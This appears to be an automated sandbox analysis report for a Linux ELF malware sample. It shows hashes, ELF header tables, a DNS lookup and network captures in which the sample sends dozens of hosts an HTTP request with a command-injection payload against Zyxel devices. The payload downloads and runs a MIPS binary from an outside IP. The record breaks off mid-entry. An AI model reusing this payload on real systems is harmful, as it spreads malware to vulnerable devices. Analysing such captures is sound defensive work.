                                                SHA1:23129c88b1e9aa8a936b4005dbcbb6fca36d35c3
                                                SHA256:a56069629de9745d155df5ea91ca8813c56f3861c5cd88aa1eda49f21c3981eb
                                                SHA512:c9aa3fe23abc5f26a21c9519f1a8d9ae419d69995e6a42adc7e187c9e2c424f54f1923163bfa42eb4e966078b52b0f54b934e8c7741ae379969b56f38c2538b0
                                                SSDEEP:3072:Ycux7mpR+XJALs6b6gaBAD5ZTdPrCWcOusgj5B6j6aW:Ycux7mpR+XJ5nmK86aW
                                                TLSH:F3E34A17B5C184FDC49AC1B44B9FBA37DD32F4AD0238B16B37C4AA222D5DE205B1EA54
                                                File Content Preview:.ELF..............>.......@.....@........^..........@.8...@.......................@.......@...............................................Q.......Q.............`...............Q.td....................................................H...._........H........

                                                ELF header

                                                Class:ELF64
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:Advanced Micro Devices X86-64
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x400194
                                                Flags:0x0
                                                ELF Header Size:64
                                                Program Header Offset:64
                                                Program Header Size:56
                                                Number of Program Headers:3
                                                Section Header Offset:155352
                                                Section Header Size:64
                                                Number of Section Headers:10
                                                Header String Table Index:9
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                .textPROGBITS0x4001000x1000x18db60x00x6AX0016
                                                .finiPROGBITS0x418eb60x18eb60xe0x00x6AX001
                                                .rodataPROGBITS0x418ee00x18ee00x36000x00x2A0032
                                                .ctorsPROGBITS0x51d0000x1d0000x180x00x3WA008
                                                .dtorsPROGBITS0x51d0180x1d0180x100x00x3WA008
                                                .dataPROGBITS0x51d0400x1d0400x8e580x00x3WA0032
                                                .bssNOBITS0x525ea00x25e980x70c00x00x3WA0032
                                                .shstrtabSTRTAB0x00x25e980x3e0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x4000000x4000000x1c4e00x1c4e06.41010x5R E0x100000.init .text .fini .rodata
                                                LOAD0x1d0000x51d0000x51d0000x8e980xff600.23250x6RW 0x100000.ctors .dtors .data .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 28, 2024 10:15:51.489845991 CET192.168.2.238.8.8.80xe735Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 28, 2024 10:15:51.594660044 CET8.8.8.8192.168.2.230xe735No error (0)haha.skyljne.click103.245.236.146A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.2354952122.83.77.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492367983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.2358282108.148.85.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492392063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.2333358200.49.62.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492403030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.2338454181.36.160.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492477894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.23339882.68.205.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492501974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.234647099.138.176.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492516994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.233746623.49.113.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492573023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.2335416182.23.127.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492618084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.23552209.140.21.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492654085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.233975297.215.143.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492687941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.2350454184.127.130.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492705107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.235222063.96.235.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492767096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.2340534194.188.124.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492819071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.2347044139.139.105.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492836952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14192.168.2.2350480173.213.176.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492858887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192.168.2.235677683.252.144.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492921114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.235878293.64.255.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.492947102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.2347708200.183.21.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493002892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.2349984171.217.206.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493040085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.234431463.5.205.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493063927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.2333336201.66.187.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493125916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.2335360170.43.14.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493168116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.233395835.179.98.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493207932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.234489890.102.132.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493262053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.2336154202.245.238.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493304968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25192.168.2.2354826189.212.226.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493360043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26192.168.2.2336920138.156.48.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493376970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                27192.168.2.234934834.144.87.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493422031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.233917879.234.62.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493438005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                29192.168.2.2332930131.49.207.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493455887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                30192.168.2.2350128174.0.135.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493478060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                31192.168.2.2339264100.237.238.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493572950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                32192.168.2.2344782153.180.222.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493602037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.2336164136.212.72.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493666887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.2341224116.192.31.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493691921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.2346860105.4.238.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493742943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.234478679.100.165.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493809938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.235657654.239.77.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493832111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.2353964206.188.88.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493896008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.235437027.252.199.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493901014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.2354186146.160.96.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493920088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.235431291.117.195.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.493952990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.2353856193.27.185.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494016886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.2334654172.138.95.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494056940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.2356288221.253.103.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494072914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.2338624111.151.30.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494131088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.2337012209.175.207.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494142056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.235528280.235.12.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494230032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.233526080.166.63.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494246960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.2342218212.210.82.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494271040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.233573097.76.219.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494292021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                51192.168.2.235687242.119.7.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494337082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                52192.168.2.2341596140.51.89.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494396925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                53192.168.2.2354022155.81.175.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494400024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                54192.168.2.2347992104.128.31.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494465113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                55192.168.2.2334754153.75.9.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:51.494493008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                56192.168.2.2356758111.17.175.125443
                                                TimestampBytes transferredDirectionData
